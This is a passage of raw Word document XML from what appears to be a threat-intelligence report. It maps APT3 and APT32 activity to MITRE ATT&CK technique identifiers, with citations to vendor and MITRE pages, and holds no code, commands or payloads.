                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="224D27BB" w14:textId="6E011516" w:rsidR="00792749" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04F9E6F6" w14:textId="10195D5C" w:rsidR="00792749" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] A model sequence based on [1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00792749">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Once APT3 has access to a target network, they work quickly and they are extremely proficient at enumerating and moving laterally to maintain their access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF6034" w:rsidRPr="000966C3" w14:paraId="091E2EAB" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C4C2E3B" w14:textId="27E7FD7E" w:rsidR="00FF6034" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71967030" w14:textId="173E7787" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF3C09">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AF3C09">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AF3C09">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="335ACAB6" w14:textId="35281EB6" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00792749">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00792749">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00792749">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1F89E6" w14:textId="7489CC50" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DFA17F7" w14:textId="77777777" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00FF6034" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E764FA5" w14:textId="21D7E518" w:rsidR="00FF6034" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BDA62F5" w14:textId="6431F18F" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="241307C7" w14:textId="21D363DD" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A623E8" w:rsidRPr="000966C3" w14:paraId="7AA7A1FA" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56C970E1" w14:textId="3F6081E1" w:rsidR="00A623E8" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FC4FAB" w14:textId="6AF38C10" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52890420" w14:textId="1C513E6C" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D701185" w14:textId="23E1201A" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5D099B" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F468DE6" w14:textId="57E47E32" w:rsidR="00A623E8" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40BE7D82" w14:textId="73CA2259" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E1AC9B" w14:textId="37FEB9AA" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00A623E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="70"/>
      <w:tr w:rsidR="00A623E8" w:rsidRPr="000966C3" w14:paraId="04F163D8" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A436FD5" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="282603EA" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5570F110" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68DCD078" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A368DBE" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E89F6C" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C38AD35" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75597BDA" w14:textId="77777777" w:rsidR="00A623E8" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EE252E4" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="0077286F" w:rsidRDefault="007545F1" w:rsidP="007545F1"/>
    <w:p w14:paraId="2B92DEB4" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00C94979" w:rsidRDefault="007545F1" w:rsidP="007545F1"/>
    <w:p w14:paraId="3C766C1E" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="007545F1">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78954F22" w14:textId="09EAF66A" w:rsidR="00FC3056" w:rsidRDefault="00E54EA3" w:rsidP="00424E34">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15FBE381" w14:textId="1F02EDCD" w:rsidR="00E54EA3" w:rsidRDefault="00E54EA3" w:rsidP="00424E34">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Exploitation for Client Execution, Technique T1203 - Enterprise | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E69A1CC" w14:textId="346B0546" w:rsidR="003B0DFF" w:rsidRDefault="003B0DFF" w:rsidP="00424E34">
      <w:r w:rsidRPr="003B0DFF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="003B0DFF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">UPS: Observations on CVE-2015-3113, Prior Zero-Days and the </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Pirpi</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Payload (paloaltonetworks.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08B62F51" w14:textId="361F6DDF" w:rsidR="00B04620" w:rsidRDefault="00B04620" w:rsidP="00424E34">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Endpoint Protection - Symantec Enterprise (broadcom.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2016]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC6DC93" w14:textId="5BD201D4" w:rsidR="00B04620" w:rsidRPr="00B04620" w:rsidRDefault="00B04620" w:rsidP="00424E34">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">APT3, Gothic Panda, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Pirpi</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, UPS Team, Buckeye, Threat Group-0110, TG-0110, Group G0022 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69CBB20C" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E"/>
    <w:p w14:paraId="625CECE8" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E"/>
    <w:p w14:paraId="7A68DB9E" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F9697C" w14:textId="57F310BB" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc153480863"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APT32</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="78506E6B" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="005B4630" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc153480864"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="40A8FDCD" w14:textId="7D9C4FE1" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0018 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C773B8F" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0050 - APT32 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534A6E8" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3D078" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is VN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779182A7"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1589', 'T1589.002', 'T1598.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E32A3"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1589 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Gather Victim Identity Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F95554"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T1589.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Email Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B679D"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T1598.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing for Information&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D29B53"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
